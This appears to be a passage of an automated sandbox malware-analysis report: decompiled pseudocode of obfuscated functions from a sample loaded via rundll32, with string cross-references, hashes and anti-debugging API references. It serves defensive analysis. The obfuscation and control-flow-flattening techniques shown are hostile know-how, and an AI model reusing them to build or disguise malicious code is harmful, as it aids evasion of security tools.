				signed int _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t213;
				signed int _t214;
				void* _t216;
				signed int _t222;
				intOrPtr _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				void* _t230;
				void* _t236;
				void* _t257;
				signed int* _t261;

				_t261 =  &_v100;
				_v8 = 0xc74bd8;
				_v4 = 0;
				_v72 = 0x3d4417;
				_v72 = _v72 << 8;
				_v72 = _v72 + 0xffff33fd;
				_v72 = _v72 ^ 0xbd434afc;
				_v32 = 0xa9ac19;
				_v32 = _v32 + 0x4aca;
				_v32 = _v32 ^ 0x00a9f6e1;
				_v40 = 0x1f6a8;
				_v12 = 0;
				_v40 = _v40 * 0x6f;
				_t257 = 0xf52a3f4;
				_v40 = _v40 ^ 0x00d19880;
				_v44 = 0x168b17;
				_v44 = _v44 + 0x13a5;
				_v44 = _v44 ^ 0x001ee95f;
				_v48 = 0xfac2ed;
				_v48 = _v48 + 0xffff2a35;
				_v48 = _v48 ^ 0x00fbd9f9;
				_v92 = 0xc00c53;
				_v92 = _v92 + 0xffff1aa9;
				_v92 = _v92 + 0xf2d7;
				_t225 = 0x68;
				_v92 = _v92 / _t225;
				_v92 = _v92 ^ 0x0000565c;
				_v68 = 0xf2ac97;
				_v68 = _v68 ^ 0x99fc0549;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000a8804;
				_v24 = 0xf89d13;
				_t226 = 0x49;
				_v24 = _v24 / _t226;
				_v24 = _v24 ^ 0x000ed122;
				_v96 = 0x9976f7;
				_v96 = _v96 >> 0xe;
				_v96 = _v96 ^ 0xdd1af6ea;
				_v96 = _v96 ^ 0x684d855d;
				_v96 = _v96 ^ 0xb5551d4c;
				_v28 = 0x12a2d6;
				_t227 = 0xe;
				_v28 = _v28 * 0x29;
				_v28 = _v28 ^ 0x02ffade5;
				_v100 = 0x1d8880;
				_v100 = _v100 + 0x8a1e;
				_v100 = _v100 * 0x7c;
				_v100 = _v100 + 0xffff421a;
				_v100 = _v100 ^ 0x0e9f1559;
				_v36 = 0x784079;
				_v36 = _v36 / _t227;
				_v36 = _v36 ^ 0x0007caf6;
				_v60 = 0xd037f8;
				_v60 = _v60 >> 0xf;
				_v60 = _v60 + 0xfffff3b4;
				_v60 = _v60 ^ 0xfff3df4e;
				_v64 = 0x95f516;
				_v64 = _v64 + 0xffffc55a;
				_v64 = _v64 | 0x523f0ae6;
				_v64 = _v64 ^ 0x52b19695;
				_v84 = 0x271827;
				_v84 = _v84 + 0xffff7017;
				_v84 = _v84 + 0x1e15;
				_v84 = _v84 ^ 0xa1c53b6b;
				_v84 = _v84 ^ 0xa1e64a9e;
				_v52 = 0x3d5883;
				_v52 = _v52 >> 5;
				_v52 = _v52 << 3;
				_v52 = _v52 ^ 0x000b56f4;
				_v56 = 0xd5acf2;
				_v56 = _v56 ^ 0x15c9a5cd;
				_v56 = _v56 << 3;
				_v56 = _v56 ^ 0xa8e6808a;
				_v88 = 0xcc2476;
				_v88 = _v88 + 0x4ceb;
				_v88 = _v88 ^ 0xdbab884b;
				_t228 = 0x4f;
				_v88 = _v88 / _t228;
				_v88 = _v88 ^ 0x02ce2d39;
				_v20 = 0x9b21e;
				_v20 = _v20 + 0x218b;
				_v20 = _v20 ^ 0x00037084;
				_v76 = 0xcba48;
				_t229 = 0x5a;
				_t222 = _v12;
				_v76 = _v76 * 0x7b;
				_v76 = _v76 + 0x3acc;
				_v76 = _v76 << 0x10;
				_v76 = _v76 ^ 0xbb6cb0a9;
				_v80 = 0x9c886e;
				_v80 = _v80 ^ 0x88757b42;
				_t230 = 0x5c;
				_v80 = _v80 / _t229;
				_v80 = _v80 << 0xe;
				_v80 = _v80 ^ 0x5c6ae118;
				while(1) {
					L1:
					_t213 = 0xa360d2e;
					do {
						while(_t257 != _t213) {
							if(_t257 == 0xb87cfc3) {
								_t223 =  *0x7c3e10; // 0x0
								_t224 = _t223 + 0x1c;
								while(1) {
									__eflags =  *_t224 - _t230;
									if(__eflags == 0) {
										break;
									}
									_t224 = _t224 + 2;
									__eflags = _t224;
								}
								_t222 = _t224 + 2;
								_t257 = 0xc7301de;
								goto L1;
							} else {
								if(_t257 == 0xc7301de) {
									_push(_v48);
									_push(_v44);
									_t216 = E007BDCF7(_v40, 0x7a1080, __eflags);
									_pop(_t236);
									__eflags = E007AAAD6(_t216, _v92, _v68, _v72, _t236, _t236, _v24, _v96, _v28, _t236,  &_v16, _v100, _t236, _v32, _t236, _v36);
									_t257 =  ==  ? 0xa360d2e : 0x57f878b;
									E007AA8B0(_v60, _t216, _v64);
									_t261 =  &(_t261[0xf]);
									L14:
									_t213 = 0xa360d2e;
									_t230 = 0x5c;
									goto L15;
								} else {
									if(_t257 == 0xdd28c3f) {
										E007A1FD1(_v20, _v76, _v80, _v16);
									} else {
										if(_t257 != 0xf52a3f4) {
											goto L15;
										} else {
											_t257 = 0xb87cfc3;
											continue;
										}
									}
								}
							}
							L18:
							return _v12;
						}
						_t214 = E007A1F53(_v16, _v84, _v52, _t222, _v56, _v88);
						_t261 =  &(_t261[4]);
						__eflags = _t214;
						_t257 = 0xdd28c3f;
						_t191 = _t214 == 0;
						__eflags = _t191;
						_v12 = 0 | _t191;
						goto L14;
						L15:
						__eflags = _t257 - 0x57f878b;
					} while (__eflags != 0);
					goto L18;
				}
			}

0x007a3e3f
0x007a3e42
0x007a3e4c
0x007a3e52
0x007a3e5a
0x007a3e5f
0x007a3e67
0x007a3e6f
0x007a3e77
0x007a3e7f
0x007a3e87
0x007a3e8f
0x007a3e9c
0x007a3ea0
0x007a3ea5
0x007a3ead
0x007a3eb5
0x007a3ebd
0x007a3ec5
0x007a3ecd
0x007a3ed5
0x007a3edd
0x007a3ee5
0x007a3eed
0x007a3efb
0x007a3f00
0x007a3f06
0x007a3f0e
0x007a3f16
0x007a3f1e
0x007a3f23
0x007a3f2b
0x007a3f37
0x007a3f3c
0x007a3f42
0x007a3f4a
0x007a3f52
0x007a3f57
0x007a3f5f
0x007a3f67
0x007a3f6f
0x007a3f7c
0x007a3f7d
0x007a3f81
0x007a3f89
0x007a3f91
0x007a3f9e
0x007a3fa2
0x007a3faa
0x007a3fb2
0x007a3fc0
0x007a3fc4
0x007a3fcc
0x007a3fd4
0x007a3fd9
0x007a3fe1
0x007a3fe9
0x007a3ff1
0x007a3ff9
0x007a4001
0x007a4009
0x007a4011
0x007a4019
0x007a4023
0x007a4030
0x007a4038
0x007a4040
0x007a4045
0x007a404a
0x007a4052
0x007a405a
0x007a4062
0x007a4067
0x007a406f
0x007a4077
0x007a407f
0x007a408d
0x007a4092
0x007a4098
0x007a40a0
0x007a40a8
0x007a40b0
0x007a40b8
0x007a40c5
0x007a40c6
0x007a40cc
0x007a40d0
0x007a40d8
0x007a40dd
0x007a40e5
0x007a40ed
0x007a40fb
0x007a40fc
0x007a4100
0x007a4105
0x007a410d
0x007a410d
0x007a410d
0x007a4112
0x007a4112
0x007a411c
0x007a41bb
0x007a41c1
0x007a41c9
0x007a41c9
0x007a41cc
0x00000000
0x00000000
0x007a41c6
0x007a41c6
0x007a41c6
0x007a41ce
0x007a41d1
0x00000000
0x007a4122
0x007a4128
0x007a4146
0x007a414f
0x007a4157
0x007a415d
0x007a41a0
0x007a41ae
0x007a41b1
0x007a41b6
0x007a4208
0x007a420a
0x007a420f
0x00000000
0x007a412a
0x007a4130
0x007a422e
0x007a4136
0x007a413c
0x00000000
0x007a4142
0x007a4142
0x00000000
0x007a4142
0x007a413c
0x007a4130
0x007a4128
0x007a4235
0x007a4240
0x007a4240
0x007a41f0
0x007a41f7
0x007a41fa
0x007a41fc
0x007a4201
0x007a4201
0x007a4204
0x00000000
0x007a4210
0x007a4210
0x007a4210
0x00000000
0x007a421c

Strings

?R, xrefs: 007A3FF9
y@x, xrefs: 007A3FB2
L, xrefs: 007A4077
.6, xrefs: 007A420A
.6, xrefs: 007A41A2
.6, xrefs: 007A410D

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: .6$.6$.6$y@x$?R$L
API String ID: 0-3177096336
Opcode ID: 545ccfd22ef81de597f7b67e4b11c978a9aee337bf776315e65559cbd4b4e0d4
Instruction ID: 19da73d5b2e209d14fe55daddeda54706119c50e72d1964f9b94797983894b47
Opcode Fuzzy Hash: 545ccfd22ef81de597f7b67e4b11c978a9aee337bf776315e65559cbd4b4e0d4
Instruction Fuzzy Hash: D9A140B25083809FD798CF29C88A51BBBF1FBD5758F108A1DF19586260D3BA8949CF47

Uniqueness

Uniqueness Score: -1.00%

Function 007AB74D Relevance: 7.7, Strings: 6, Instructions: 217
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E007AB74D(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t231;
				intOrPtr _t232;
				intOrPtr _t233;
				void* _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				void* _t266;
				void* _t267;
				signed int* _t270;
				signed int* _t271;

				_t270 =  &_v104;
				_v4 = _v4 & 0x00000000;
				_v12 = 0x6c2b32;
				_v8 = 0x58b11;
				_v64 = 0x37f8ee;
				_v64 = _v64 + 0xffff6702;
				_v64 = _v64 ^ 0xad40df3f;
				_v64 = _v64 ^ 0xad79282c;
				_v100 = 0x6d524;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 + 0x2921;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x00050ee9;
				_v28 = 0x9e9a;
				_t266 = __edx;
				_t237 = __ecx;
				_t267 = 0x52ffaa2;
				_t239 = 0xb;
				_v28 = _v28 / _t239;
				_v28 = _v28 ^ 0x00028e70;
				_v32 = 0x2476b5;
				_t240 = 0x6f;
				_v32 = _v32 / _t240;
				_v32 = _v32 ^ 0x0008b44d;
				_v60 = 0x9e7d2d;
				_v60 = _v60 >> 0xc;
				_v60 = _v60 << 0xe;
				_v60 = _v60 ^ 0x02752993;
				_v24 = 0xe09194;
				_t241 = 0x44;
				_v24 = _v24 / _t241;
				_v24 = _v24 ^ 0x0009703f;
				_v96 = 0x854eb1;
				_v96 = _v96 + 0xc1c6;
				_v96 = _v96 * 0x1a;
				_v96 = _v96 | 0x594c04b7;
				_v96 = _v96 ^ 0x5dd9e9b5;
				_v20 = 0x86d30b;
				_v20 = _v20 | 0xe45dff90;
				_v20 = _v20 ^ 0xe4d4624e;
				_v92 = 0x8501b9;
				_v92 = _v92 >> 6;
				_v92 = _v92 * 0x2f;
				_v92 = _v92 + 0xe9ed;
				_v92 = _v92 ^ 0x0060653e;
				_v52 = 0xaa921f;
				_v52 = _v52 ^ 0x3dfd2146;
				_v52 = _v52 >> 1;
				_v52 = _v52 ^ 0x1ea8ab64;
				_v56 = 0x2765e6;
				_v56 = _v56 ^ 0x5c8ea534;
				_v56 = _v56 | 0xccee86e2;
				_v56 = _v56 ^ 0xdcebf872;
				_v88 = 0x89b797;
				_v88 = _v88 + 0x84ba;
				_v88 = _v88 + 0xc14;
				_v88 = _v88 | 0xbe23ba3f;
				_v88 = _v88 ^ 0xbea6e118;
				_v48 = 0x866a1d;
				_v48 = _v48 >> 9;
				_v48 = _v48 * 0x16;
				_v48 = _v48 ^ 0x0007ec78;
				_v16 = 0x7d5d8a;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x000578c4;
				_v68 = 0x2c77b1;
				_v68 = _v68 | 0xad369f51;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0xdff48475;
				_v72 = 0x3ef83;
				_v72 = _v72 << 3;
				_v72 = _v72 + 0xb46;
				_v72 = _v72 ^ 0x001ba742;
				_v76 = 0x4a0f2c;
				_t242 = 0x6a;
				_v76 = _v76 * 0x54;
				_v76 = _v76 << 0xa;
				_v76 = _v76 ^ 0x33e29f20;
				_v36 = 0x9fb368;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 ^ 0x000f389a;
				_v40 = 0x5cfe3a;
				_v40 = _v40 + 0x27ff;
				_v40 = _v40 ^ 0x005ee30c;
				_v104 = 0xfd26ea;
				_v104 = _v104 << 9;
				_v104 = _v104 + 0xffff1095;
				_v104 = _v104 + 0xffffd24c;
				_v104 = _v104 ^ 0xfa4b2973;
				_v80 = 0xbb493f;
				_v80 = _v80 + 0x4ae2;
				_v80 = _v80 | 0xbb4dbcb8;
				_v80 = _v80 + 0x3bc7;
				_v80 = _v80 ^ 0xbbf0b3fa;
				_v44 = 0xfc3c2e;
				_v44 = _v44 << 0x10;
				_v44 = _v44 + 0xffff4208;
				_v44 = _v44 ^ 0x3c281d99;
				_v84 = 0xc50344;
				_v84 = _v84 | 0xb9ed19f4;
				_v84 = _v84 / _t242;
				_t243 = 0x6b;
				_v84 = _v84 / _t243;
				_v84 = _v84 ^ 0x000f16db;
				while(1) {
					L1:
					_t231 = 0xc3f018b;
					do {
						L2:
						while(_t267 != 0x52ffaa2) {
							if(_t267 == 0x865547f) {
								_t243 = _v88;
								_t232 = E007ACDAE(_v88, _v48, _v16,  *((intOrPtr*)(_t266 + 0x38)));
								_t270 =  &(_t270[2]);
								 *((intOrPtr*)(_t266 + 0x1c)) = _t232;
								__eflags = _t232;
								_t231 = 0xc3f018b;
								_t267 =  !=  ? 0xc3f018b : 0xb7a2405;
								continue;
							}
							if(_t267 == 0xb133873) {
								_push(_v32);
								_t233 = E007BC3A0(_t237, _v64, __eflags, _v100, _v28, _t243);
								_t271 =  &(_t270[4]);
								 *((intOrPtr*)(_t266 + 0x38)) = _t233;
								__eflags = _t233;
								if(_t233 != 0) {
									E007A7B8B( *((intOrPtr*)(_t266 + 0x38)), _v60,  *((intOrPtr*)(_t266 + 0x38)), _v24, _v96);
									_push( *((intOrPtr*)(_t266 + 0x38)));
									_push(_v56);
									_push(_v52);
									_t243 = _v20;
									E007A7C37(_v20, _v92);
									_t270 =  &(_t271[6]);
									_t267 = 0x865547f;
									goto L1;
								}
							} else {
								if(_t267 == 0xb7a2405) {
									return E007B9E56(_v80, _v44, _v84,  *((intOrPtr*)(_t266 + 0x38)));
								}
								if(_t267 != _t231) {
									goto L13;
								} else {
									_t233 = E007A46BE(_t243, _v68, _t243, _v72, _t243, _v76, _v36, _v40, _t243, _t266, E007A4C5D, _v104);
									_t270 =  &(_t270[0xa]);
									 *((intOrPtr*)(_t266 + 0x2c)) = _t233;
									if(_t233 == 0) {
										_t267 = 0xb7a2405;
										while(1) {
											L1:
											_t231 = 0xc3f018b;
											goto L2;
										}
									}
								}
							}
							return _t233;
						}
						_t267 = 0xb133873;
						L13:
						__eflags = _t267 - 0x1aeb2e;
					} while (__eflags != 0);
					return _t231;
				}
			}

0x007ab74d
0x007ab750
0x007ab755
0x007ab75d
0x007ab765
0x007ab76d
0x007ab775
0x007ab77d
0x007ab785
0x007ab78d
0x007ab792
0x007ab79a
0x007ab79f
0x007ab7a7
0x007ab7b7
0x007ab7b9
0x007ab7bf
0x007ab7c4
0x007ab7c9
0x007ab7cf
0x007ab7d7
0x007ab7e3
0x007ab7e8
0x007ab7ee
0x007ab7f6
0x007ab7fe
0x007ab803
0x007ab808
0x007ab810
0x007ab81c
0x007ab81f
0x007ab823
0x007ab82b
0x007ab833
0x007ab840
0x007ab844
0x007ab84c
0x007ab854
0x007ab85c
0x007ab864
0x007ab86c
0x007ab874
0x007ab87e
0x007ab882
0x007ab88a
0x007ab892
0x007ab89a
0x007ab8a2
0x007ab8a6
0x007ab8ae
0x007ab8b6
0x007ab8be
0x007ab8c6
0x007ab8ce
0x007ab8d6
0x007ab8de
0x007ab8e6
0x007ab8ee
0x007ab8f6
0x007ab8fe
0x007ab908
0x007ab90c
0x007ab914
0x007ab91c
0x007ab923
0x007ab930
0x007ab938
0x007ab940
0x007ab945
0x007ab94d
0x007ab955
0x007ab95a
0x007ab962
0x007ab96a
0x007ab979
0x007ab97c
0x007ab980
0x007ab985
0x007ab98d
0x007ab995
0x007ab99a
0x007ab9a2
0x007ab9aa
0x007ab9b2
0x007ab9ba
0x007ab9c2
0x007ab9c7
0x007ab9cf
0x007ab9d7
0x007ab9df
0x007ab9e7
0x007ab9ef
0x007ab9f7
0x007ab9ff
0x007aba07
0x007aba0f
0x007aba14
0x007aba1c
0x007aba24
0x007aba2c
0x007aba3c
0x007aba44
0x007aba47
0x007aba4b
0x007aba53
0x007aba53
0x007aba53
0x007aba58
0x00000000
0x007aba58
0x007aba6a
0x007abb2d
0x007abb31
0x007abb36
0x007abb39
0x007abb3c
0x007abb40
0x007abb45
0x00000000
0x007abb45
0x007aba76
0x007abac0
0x007abad3
0x007abad8
0x007abadb
0x007abade
0x007abae0
0x007abaf8
0x007abafd
0x007abb00
0x007abb04
0x007abb0c
0x007abb10
0x007abb15
0x007abb18
0x00000000
0x007abb18
0x007aba78
0x007aba7a
0x00000000
0x007abb75
0x007aba82
0x00000000
0x007aba88
0x007abaa9
0x007abaae
0x007abab1
0x007abab6
0x007ababc
0x007aba53
0x007aba53
0x007aba53
0x00000000
0x007aba53
0x007aba53
0x007abab6
0x007aba82
0x007abb7d
0x007abb7d
0x007abb4d
0x007abb52
0x007abb52
0x007abb52
0x00000000
0x007aba58

Strings

2+l, xrefs: 007AB755
?p, xrefs: 007AB823
!), xrefs: 007AB792
>e`, xrefs: 007AB88A
e', xrefs: 007AB8AE
J, xrefs: 007AB9E7

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !)$2+l$>e`$?p$J$e'
API String ID: 0-1675410552
Opcode ID: fc8737d68fe4c613beac0bdb8f666ef57204642bc70ef98033aea1274e08345f
Instruction ID: a1bc47bc5b7bbad180af49270a34202649fff75c8ebdd1e18a14b41812b4d56d
Opcode Fuzzy Hash: fc8737d68fe4c613beac0bdb8f666ef57204642bc70ef98033aea1274e08345f
Instruction Fuzzy Hash: 94B130724083409FC358CF65C58A40BFBE2FBC6758F108A1CF58A96260D3B9CA59CF86

Uniqueness

Uniqueness Score: -1.00%

Function 1002F81E Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 100357B5
SetUnhandledExceptionFilter.KERNEL32 ref: 100357CA
UnhandledExceptionFilter.KERNEL32(10049C70), ref: 100357D5
GetCurrentProcess.KERNEL32(C0000409), ref: 100357F1
TerminateProcess.KERNEL32(00000000), ref: 100357F8

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
Instruction ID: 3237c6aacfb12be4d9d12df29f826ae8d0614ddfd4a103b53015e2b6a0b2c6c3
Opcode Fuzzy Hash: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
Instruction Fuzzy Hash: B021FFB4801320CFFB11DF68EDC56483BB4FB88315F50606AE90D87A71E7B16A80AF56

Uniqueness

Uniqueness Score: -1.00%

Function 007C0056 Relevance: 6.7, Strings: 5, Instructions: 443
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E007C0056() {
				char _v520;
				char _v1040;
				char _v1560;
				char _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				unsigned int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				void* _t500;
				void* _t502;
				intOrPtr* _t509;
				void* _t513;
				signed int _t522;
				intOrPtr _t523;
				intOrPtr* _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				void* _t540;
				void* _t546;
				intOrPtr _t556;
				void* _t603;
				signed int _t605;
				signed int* _t609;

				_t609 =  &_v1748;
				_v1648 = 0xded5e0;
				_v1648 = _v1648 >> 0xb;
				_v1648 = _v1648 | 0x3a1a97de;
				_v1648 = _v1648 ^ 0x3a1a9ff7;
				_v1608 = 0x6694ca;
				_v1608 = _v1608 | 0xdc2b4f48;
				_v1608 = _v1608 ^ 0x5c6fdfcb;
				_v1712 = 0x53f825;
				_v1712 = _v1712 >> 2;
				_v1712 = _v1712 ^ 0x4e440c95;
				_v1712 = _v1712 | 0x7235b0e7;
				_v1712 = _v1712 ^ 0x7e75f2fd;
				_v1632 = 0xc6d169;
				_v1568 = 0;
				_t603 = 0x9805d0a;
				_t525 = 0x52;
				_v1632 = _v1632 / _t525;
				_t526 = 0x67;
				_v1632 = _v1632 * 0x1e;
				_v1632 = _v1632 ^ 0x0048bcfb;
				_v1596 = 0x189afb;
				_v1596 = _v1596 >> 0xe;
				_v1596 = _v1596 ^ 0x000d7c1d;
				_v1724 = 0x4bfed1;
				_v1724 = _v1724 * 0x63;
				_v1724 = _v1724 * 0x55;
				_v1724 = _v1724 >> 1;
				_v1724 = _v1724 ^ 0x61069d5d;
				_v1580 = 0x401b2b;
				_v1580 = _v1580 + 0x7090;
				_v1580 = _v1580 ^ 0x00412b45;
				_v1672 = 0xbaa782;
				_v1672 = _v1672 / _t526;
				_v1672 = _v1672 << 2;
				_v1672 = _v1672 ^ 0x000e5528;
				_v1624 = 0x1efbce;
				_t527 = 0x4f;
				_v1624 = _v1624 / _t527;
				_v1624 = _v1624 ^ 0x000dc160;
				_v1572 = 0x9ef416;
				_t605 = 0x62;
				_v1572 = _v1572 / _t605;
				_v1572 = _v1572 ^ 0x00079814;
				_v1612 = 0x4efe15;
				_t528 = 0x43;
				_v1612 = _v1612 / _t528;
				_v1612 = _v1612 ^ 0x000e5446;
				_v1640 = 0x94326d;
				_t529 = 0x77;
				_v1640 = _v1640 / _t529;
				_t530 = 0x35;
				_v1640 = _v1640 / _t530;
				_v1640 = _v1640 ^ 0x000d83b8;
				_v1676 = 0x511d41;
				_t531 = 9;
				_v1676 = _v1676 * 0x76;
				_v1676 = _v1676 ^ 0xeef8e480;
				_v1676 = _v1676 ^ 0xcb952f57;
				_v1708 = 0x4e0a18;
				_v1708 = _v1708 ^ 0x2110c6ad;
				_v1708 = _v1708 | 0x4a7f48ac;
				_v1708 = _v1708 + 0xffff2cb4;
				_v1708 = _v1708 ^ 0x6b758b76;
				_v1732 = 0x7a6741;
				_t123 =  &_v1732; // 0x7a6741
				_v1732 =  *_t123 / _t531;
				_v1732 = _v1732 << 0xe;
				_v1732 = _v1732 << 7;
				_v1732 = _v1732 ^ 0x36245548;
				_v1700 = 0x42788;
				_t532 = 0x44;
				_v1700 = _v1700 / _t532;
				_v1700 = _v1700 | 0xce808109;
				_v1700 = _v1700 + 0xffff7a0f;
				_v1700 = _v1700 ^ 0xce88d2ed;
				_v1740 = 0x39c25c;
				_v1740 = _v1740 + 0xf71;
				_t533 = 0x75;
				_v1740 = _v1740 / _t533;
				_v1740 = _v1740 ^ 0xc60840fd;
				_v1740 = _v1740 ^ 0xc60d36f5;
				_v1716 = 0x2bcc6c;
				_v1716 = _v1716 + 0x97be;
				_v1716 = _v1716 >> 0xd;
				_v1716 = _v1716 ^ 0xcb020dbc;
				_v1716 = _v1716 ^ 0xcb05808e;
				_v1604 = 0x3f7ac0;
				_v1604 = _v1604 + 0xafc6;
				_v1604 = _v1604 ^ 0x0048c4ef;
				_v1576 = 0x9f011d;
				_v1576 = _v1576 ^ 0x8bb25c52;
				_v1576 = _v1576 ^ 0x8b2a60ae;
				_v1684 = 0xe4045e;
				_v1684 = _v1684 * 0x42;
				_v1684 = _v1684 * 0xc;
				_v1684 = _v1684 ^ 0xc16ccb70;
				_v1720 = 0x76be5;
				_v1720 = _v1720 >> 0xd;
				_v1720 = _v1720 * 0x3b;
				_v1720 = _v1720 + 0xffffaa4e;
				_v1720 = _v1720 ^ 0xfff1ea6d;
				_v1680 = 0x1fb4c3;
				_v1680 = _v1680 << 4;
				_v1680 = _v1680 << 0xc;
				_v1680 = _v1680 ^ 0xb4c6c556;
				_v1644 = 0xb0dbcd;
				_v1644 = _v1644 << 0xf;
				_v1644 = _v1644 << 0x10;
				_v1644 = _v1644 ^ 0x800a09c5;
				_v1600 = 0x1a67e8;
				_v1600 = _v1600 | 0xeb4b5744;
				_v1600 = _v1600 ^ 0xeb54c7c0;
				_v1652 = 0x1784b1;
				_v1652 = _v1652 >> 0xf;
				_v1652 = _v1652 << 6;
				_v1652 = _v1652 ^ 0x00082079;
				_v1660 = 0xec7770;
				_v1660 = _v1660 + 0xb190;
				_v1660 = _v1660 | 0x400c0cca;
				_v1660 = _v1660 ^ 0x40ee2104;
				_v1668 = 0xfc9259;
				_v1668 = _v1668 + 0xffffc6b7;
				_v1668 = _v1668 >> 0xe;
				_v1668 = _v1668 ^ 0x000f272a;
				_v1704 = 0xff7fae;
				_v1704 = _v1704 + 0xffff711f;
				_v1704 = _v1704 + 0xffff4b94;
				_v1704 = _v1704 | 0x5a3393fe;
				_v1704 = _v1704 ^ 0x5af53198;
				_v1616 = 0x130067;
				_t534 = 0x4e;
				_v1616 = _v1616 / _t534;
				_v1616 = _v1616 ^ 0x00057283;
				_v1628 = 0x10552;
				_v1628 = _v1628 + 0xf3cd;
				_v1628 = _v1628 + 0x9e6e;
				_v1628 = _v1628 ^ 0x00033ec8;
				_v1636 = 0x95cc92;
				_v1636 = _v1636 >> 0xf;
				_v1636 = _v1636 + 0x9761;
				_v1636 = _v1636 ^ 0x000e6713;
				_v1748 = 0xd7b406;
				_t535 = 0x31;
				_v1748 = _v1748 * 0x46;
				_v1748 = _v1748 << 1;
				_v1748 = _v1748 + 0x479a;
				_v1748 = _v1748 ^ 0x75ff50ef;
				_v1584 = 0xe29275;
				_v1584 = _v1584 * 0x6d;
				_v1584 = _v1584 ^ 0x607f0d3c;
				_v1664 = 0xc2b99a;
				_v1664 = _v1664 / _t605;
				_v1664 = _v1664 | 0xc7d1021c;
				_v1664 = _v1664 ^ 0xc7dc1815;
				_v1692 = 0xa5d2da;
				_v1692 = _v1692 * 0x17;
				_v1692 = _v1692 / _t535;
				_t536 = 0x23;
				_v1692 = _v1692 * 0x3a;
				_v1692 = _v1692 ^ 0x11a891cb;
				_v1656 = 0x680db3;
				_v1656 = _v1656 >> 6;
				_v1656 = _v1656 >> 5;
				_v1656 = _v1656 ^ 0x000507e8;
				_v1728 = 0x12970f;
				_v1728 = _v1728 + 0xffffbe66;
				_v1728 = _v1728 >> 6;
				_v1728 = _v1728 / _t536;
				_v1728 = _v1728 ^ 0x00053169;
				_v1620 = 0xa87d1b;
				_v1620 = _v1620 + 0xc3ba;
				_v1620 = _v1620 ^ 0x00a7b1ac;
